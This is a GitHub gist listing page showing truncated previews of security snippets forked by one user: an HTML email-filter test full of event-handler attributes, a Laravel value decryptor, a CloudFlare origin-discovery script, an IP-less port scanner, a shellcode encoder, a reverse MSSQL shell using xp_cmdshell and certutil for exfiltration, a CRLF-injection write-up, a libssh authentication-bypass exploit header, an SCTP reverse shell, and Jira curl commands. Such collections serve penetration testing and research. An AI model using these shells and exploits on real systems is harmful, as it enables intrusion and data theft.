@ricardojba
ricardojba / html_test.html
Created December 19, 2016 14:26 — forked from rwestergren/html_test.html
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
@ricardojba
ricardojba / crypt.py
Created April 18, 2017 08:14 — forked from fideloper/crypt.py
Decrypt Laravel-encrypted value
import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads
def decrypt(payload):
data = json.loads(base64.b64decode(payload))
@ricardojba
ricardojba / cloudsnare
Created October 4, 2017 13:32 — forked from chokepoint/cloudsnare
Identify IPv4 hosts behind CloudFlare using certificate data
#!/usr/bin/env python3
import censys.certificates
import censys.ipv4
from sys import argv
UID = "**CHANGE**"
SECRET = "**CHANGE**"
def is_cloudflare(dn):
@ricardojba
ricardojba / ipless-scan.py
Created October 30, 2017 17:33 — forked from DiabloHorn/ipless-scan.py
Perform a port scan without having an IP configured on your network interface
#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
# pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
# sendp(pkt,iface='eth0')
import sys
from scapy.all import *
@ricardojba
ricardojba / ascii-shellcode-encoder.py
Created November 20, 2017 17:26 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract-arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives the program a binary-encoded shellcode on its input,
# and it yields the ASCII-encoded form on its output.
#
# This payload will at the beginning align the stack by firstly moving
@ricardojba
ricardojba / mandros.py
Created July 4, 2018 09:35 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / php-curl-crlf-injection.mkd
Created August 1, 2018 16:01 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
@ricardojba
ricardojba / sctp_reverse_shell.py
Created December 3, 2018 17:29 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:47 — forked from TheMightyLlama/jira-curl.sh
Perform actions on a jira issue via curl
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" "http://localhost:8080/jira/rest/api/2/project/AN/versions"
#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X GET -H "Content-Type: application/json" "http://localhost:8080/jira/rest/api/2/search?jql=project=AN+AND+fixVersion=12345"